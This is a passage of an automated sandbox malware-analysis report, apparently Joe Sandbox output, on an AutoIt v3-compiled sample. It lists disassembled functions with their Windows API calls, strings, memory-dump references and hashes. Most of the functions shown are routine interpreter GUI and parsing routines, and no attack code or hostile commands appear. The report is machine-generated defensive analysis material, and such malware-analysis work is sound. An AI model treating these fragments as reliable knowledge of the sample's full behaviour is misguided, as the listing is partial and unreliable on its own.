                                                  • GlobalFree.KERNEL32(00000000), ref: 00C67AEE
                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C67B00
                                                  • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00C82CAC,00000000), ref: 00C67B16
                                                  • GlobalFree.KERNEL32(00000000), ref: 00C67B26
                                                  • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00C67B4C
                                                  • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00C67B6B
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C67B8D
                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C67D7A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                  • API String ID: 2211948467-2373415609
                                                  • Opcode ID: f22e5c8ff269d1954ae5d13fffc05d1824a87e90b801f7264f1bd4d14200fb4f
                                                  • Instruction ID: 852eba73ad478fd816ac99bc3e849c426eb806a18aa10a464190709dc8dd8033
                                                  • Opcode Fuzzy Hash: f22e5c8ff269d1954ae5d13fffc05d1824a87e90b801f7264f1bd4d14200fb4f
                                                  • Instruction Fuzzy Hash: 00025C75900119EFDB14DFA4DC89FAE7BB9EF48314F148668F915AB2A1C7309D42CB60
                                                  Function 00C7356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?,00C7F910), ref: 00C73627
                                                  • IsWindowVisible.USER32(?), ref: 00C7364B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpperVisibleWindow
                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                  • API String ID: 4105515805-45149045
                                                  • Opcode ID: f72c6a1a44438aa419cf98affbc40682ad34fcf8ee85983c90e10ba2d30406d5
                                                  • Instruction ID: 05cbfa57faa6be4c29c6a3b1b4892c26ae4ee3d5fc7bde61af2ce4711016a3bc
                                                  • Opcode Fuzzy Hash: f72c6a1a44438aa419cf98affbc40682ad34fcf8ee85983c90e10ba2d30406d5
                                                  • Instruction Fuzzy Hash: 05D1A1702043419BCB04EF10C456AAE77E1EF96394F148458F89A5B3E2DB71EE8AFB51
                                                  Function 00C7A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetTextColor.GDI32(?,00000000), ref: 00C7A630
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00C7A661
                                                  • GetSysColor.USER32(0000000F), ref: 00C7A66D
                                                  • SetBkColor.GDI32(?,000000FF), ref: 00C7A687
                                                  • SelectObject.GDI32(?,00000000), ref: 00C7A696
                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00C7A6C1
                                                  • GetSysColor.USER32(00000010), ref: 00C7A6C9
                                                  • CreateSolidBrush.GDI32(00000000), ref: 00C7A6D0
                                                  • FrameRect.USER32(?,?,00000000), ref: 00C7A6DF
                                                  • DeleteObject.GDI32(00000000), ref: 00C7A6E6
                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00C7A731
                                                  • FillRect.USER32(?,?,00000000), ref: 00C7A763
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00C7A78E
                                                    • Part of subcall function 00C7A8CA: GetSysColor.USER32(00000012), ref: 00C7A903
                                                    • Part of subcall function 00C7A8CA: SetTextColor.GDI32(?,?), ref: 00C7A907
                                                    • Part of subcall function 00C7A8CA: GetSysColorBrush.USER32(0000000F), ref: 00C7A91D
                                                    • Part of subcall function 00C7A8CA: GetSysColor.USER32(0000000F), ref: 00C7A928
                                                    • Part of subcall function 00C7A8CA: GetSysColor.USER32(00000011), ref: 00C7A945
                                                    • Part of subcall function 00C7A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C7A953
                                                    • Part of subcall function 00C7A8CA: SelectObject.GDI32(?,00000000), ref: 00C7A964
                                                    • Part of subcall function 00C7A8CA: SetBkColor.GDI32(?,00000000), ref: 00C7A96D
                                                    • Part of subcall function 00C7A8CA: SelectObject.GDI32(?,?), ref: 00C7A97A
                                                    • Part of subcall function 00C7A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00C7A999
                                                    • Part of subcall function 00C7A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C7A9B0
                                                    • Part of subcall function 00C7A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00C7A9C5
                                                    • Part of subcall function 00C7A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C7A9ED
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                  • String ID:
                                                  • API String ID: 3521893082-0
                                                  • Opcode ID: bd548776e0265ff885043a2e6e5d0d6fad268d175f2e90baacd3ba411d50931c
                                                  • Instruction ID: 066fb1db0400f009666823737ef16ea0482042732ffa4937fe10a01ab60882b7
                                                  • Opcode Fuzzy Hash: bd548776e0265ff885043a2e6e5d0d6fad268d175f2e90baacd3ba411d50931c
                                                  • Instruction Fuzzy Hash: 72916D72008305EFC7109F64DC88B5F7BA9FF88321F108A2DF9AA961A0D771D985CB52
                                                  Function 00BF2C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DestroyWindow.USER32(?,?,?), ref: 00BF2CA2
                                                  • DeleteObject.GDI32(00000000), ref: 00BF2CE8
                                                  • DeleteObject.GDI32(00000000), ref: 00BF2CF3
                                                  • DestroyIcon.USER32(00000000,?,?,?), ref: 00BF2CFE
                                                  • DestroyWindow.USER32(00000000,?,?,?), ref: 00BF2D09
                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 00C2C43B
                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00C2C474
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C2C89D
                                                    • Part of subcall function 00BF1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BF2036,?,00000000,?,?,?,?,00BF16CB,00000000,?), ref: 00BF1B9A
                                                  • SendMessageW.USER32(?,00001053), ref: 00C2C8DA
                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00C2C8F1
                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00C2C907
                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00C2C912
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                  • String ID: 0
                                                  • API String ID: 464785882-4108050209
                                                  • Opcode ID: e7ad0be1a3d8ab2ba2a726f9da2d0cae033f8be55cc09d6e4fec1a2438f27023
                                                  • Instruction ID: 66f6cbd0c99485303dc797d9bcc1ba60189353b0b03b8cdbe5bd2043453133de
                                                  • Opcode Fuzzy Hash: e7ad0be1a3d8ab2ba2a726f9da2d0cae033f8be55cc09d6e4fec1a2438f27023
                                                  • Instruction Fuzzy Hash: 41127A30604215AFDB24DF24D8D4BADBBE1FF04300F5445A9F9A9CBA62C731E986DB91
                                                  Function 00C674AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DestroyWindow.USER32(00000000), ref: 00C674DE
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00C6759D
                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00C675DB
                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00C675ED
                                                  • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00C67633
                                                  • GetClientRect.USER32(00000000,?), ref: 00C6763F
                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00C67683
                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C67692
                                                  • GetStockObject.GDI32(00000011), ref: 00C676A2
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00C676A6
                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00C676B6
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C676BF
                                                  • DeleteDC.GDI32(00000000), ref: 00C676C8
                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C676F4
                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 00C6770B
                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00C67746
                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C6775A
                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 00C6776B
                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00C6779B
                                                  • GetStockObject.GDI32(00000011), ref: 00C677A6
                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C677B1
                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00C677BB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                  • API String ID: 2910397461-517079104
                                                  • Opcode ID: 738e8182d804665d3a24e45199e067e75fbfbd33bc5fc4e23a29ba8beab03828
                                                  • Instruction ID: 369037e909b081d9cb03f548ffeda8df2b8782849855536ebaba93c6d413c28a
                                                  • Opcode Fuzzy Hash: 738e8182d804665d3a24e45199e067e75fbfbd33bc5fc4e23a29ba8beab03828
                                                  • Instruction Fuzzy Hash: 18A15671A40619BFEB14DBA4DC89FAE77B9EF04714F004254FA15A72E0D770AD41CB64
                                                  Function 00C5AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00C5AD1E
                                                  • GetDriveTypeW.KERNEL32(?,00C7FAC0,?,\\.\,00C7F910), ref: 00C5ADFB
                                                  • SetErrorMode.KERNEL32(00000000,00C7FAC0,?,\\.\,00C7F910), ref: 00C5AF59
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$DriveType
                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                  • API String ID: 2907320926-4222207086
                                                  • Opcode ID: 5697ba5b596e75de712760df48ef660b23a7c74c5b5e9ec245b60bee079e8355
                                                  • Instruction ID: 01458c690e68de87f31499c4344673c4ee75ea6cdc8f4e9ebf319dba266570ae
                                                  • Opcode Fuzzy Hash: 5697ba5b596e75de712760df48ef660b23a7c74c5b5e9ec245b60bee079e8355
                                                  • Instruction Fuzzy Hash: A451DBB864410A9B8B00DB52CD42DBD73B0EF097067204376FC07A7191DA709E9EE76B
                                                  Function 00BF68DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: __wcsnicmp
                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                  • API String ID: 1038674560-86951937
                                                  • Opcode ID: 4ee6919650cf594bce220ca16c1c625591c9b904bbe12a94e10b9e1ad14e3b6b
                                                  • Instruction ID: b1497138dafdb17dce47c45dfcc637031641877b1982237abc7b1976d98f4460
                                                  • Opcode Fuzzy Hash: 4ee6919650cf594bce220ca16c1c625591c9b904bbe12a94e10b9e1ad14e3b6b
                                                  • Instruction Fuzzy Hash: 39810CB06402197BCB24AA74ED82FBF37A8EF15704F044064FE056B1D6EB70DE59E6A1
                                                  Function 00C79A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00C79AD2
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00C79B8B
                                                  • SendMessageW.USER32(?,00001102,00000002,?), ref: 00C79BA7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window
                                                  • String ID: 0
                                                  • API String ID: 2326795674-4108050209
                                                  • Opcode ID: 79fdbe313061be5fc19209d8b5866483d77f281967ca88ea4d5c0a020e4e40fb
                                                  • Instruction ID: d60ba85d1a8ca8d0e1f37c03e2a03c0236615bdc163cf6cf872789dbf6ce9ea0
                                                  • Opcode Fuzzy Hash: 79fdbe313061be5fc19209d8b5866483d77f281967ca88ea4d5c0a020e4e40fb
                                                  • Instruction Fuzzy Hash: 7202D070104301AFDB25CF25C889BAABBE5FF89314F04892DF9ADD62A1C735DA45CB52
                                                  Function 00C7A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSysColor.USER32(00000012), ref: 00C7A903
                                                  • SetTextColor.GDI32(?,?), ref: 00C7A907
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00C7A91D
                                                  • GetSysColor.USER32(0000000F), ref: 00C7A928
                                                  • CreateSolidBrush.GDI32(?), ref: 00C7A92D
                                                  • GetSysColor.USER32(00000011), ref: 00C7A945
                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C7A953
                                                  • SelectObject.GDI32(?,00000000), ref: 00C7A964
                                                  • SetBkColor.GDI32(?,00000000), ref: 00C7A96D
                                                  • SelectObject.GDI32(?,?), ref: 00C7A97A
                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00C7A999
                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C7A9B0
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00C7A9C5
                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C7A9ED
                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00C7AA14
                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00C7AA32
                                                  • DrawFocusRect.USER32(?,?), ref: 00C7AA3D
                                                  • GetSysColor.USER32(00000011), ref: 00C7AA4B
                                                  • SetTextColor.GDI32(?,00000000), ref: 00C7AA53
                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00C7AA67
                                                  • SelectObject.GDI32(?,00C7A5FA), ref: 00C7AA7E
                                                  • DeleteObject.GDI32(?), ref: 00C7AA89
                                                  • SelectObject.GDI32(?,?), ref: 00C7AA8F
                                                  • DeleteObject.GDI32(?), ref: 00C7AA94
                                                  • SetTextColor.GDI32(?,?), ref: 00C7AA9A
                                                  • SetBkColor.GDI32(?,?), ref: 00C7AAA4
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                  • String ID:
                                                  • API String ID: 1996641542-0
                                                  • Opcode ID: d472099668f24442ee4f66633c9eb75d66a2721867910cf6a2b454ca2ffb9b4b
                                                  • Instruction ID: 9c126055e7ec2f2b8b25b7e5eddb3dc7153bdbc48bdd0d67ccd92e683ced4ba9
                                                  • Opcode Fuzzy Hash: d472099668f24442ee4f66633c9eb75d66a2721867910cf6a2b454ca2ffb9b4b
                                                  • Instruction Fuzzy Hash: 0E511E71900208EFDB119FA4DC88FAE7B79EF48320F118529F929AB2A1D6719991DB50
                                                  Function 00C789D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00C78AC1
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C78AD2
                                                  • CharNextW.USER32(0000014E), ref: 00C78B01
                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00C78B42
                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00C78B58
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C78B69
                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00C78B86
                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00C78BD8
                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00C78BEE
                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C78C1F
                                                  • _memset.LIBCMT ref: 00C78C44
                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00C78C8D
                                                  • _memset.LIBCMT ref: 00C78CEC
                                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00C78D16
                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 00C78D6E
                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 00C78E1B
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00C78E3D
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C78E87
                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C78EB4
                                                  • DrawMenuBar.USER32(?), ref: 00C78EC3
                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00C78EEB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                  • String ID: 0
                                                  • API String ID: 1073566785-4108050209
                                                  • Opcode ID: 6273fa97ad9f27dd6d50c6b6d25d9db600dcc8725342f0eca70704d53c734f60
                                                  • Instruction ID: 8e29e5855083ad007e65f806b38ab2a7b143ea401456f557cfc1b9048e8fea18
                                                  • Opcode Fuzzy Hash: 6273fa97ad9f27dd6d50c6b6d25d9db600dcc8725342f0eca70704d53c734f60
                                                  • Instruction Fuzzy Hash: 9EE16374940218AFDF219F55CC89FEE7B79FF05720F10815AFA29AA190DB708A85DF60
                                                  Function 00C7488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCursorPos.USER32(?), ref: 00C749CA
                                                  • GetDesktopWindow.USER32 ref: 00C749DF
                                                  • GetWindowRect.USER32(00000000), ref: 00C749E6
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00C74A48
                                                  • DestroyWindow.USER32(?), ref: 00C74A74
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00C74A9D
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C74ABB
                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00C74AE1
                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 00C74AF6
                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00C74B09
                                                  • IsWindowVisible.USER32(?), ref: 00C74B29
                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00C74B44
                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00C74B58
                                                  • GetWindowRect.USER32(?,?), ref: 00C74B70
                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00C74B96
                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 00C74BB0
                                                  • CopyRect.USER32(?,?), ref: 00C74BC7
                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00C74C32
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
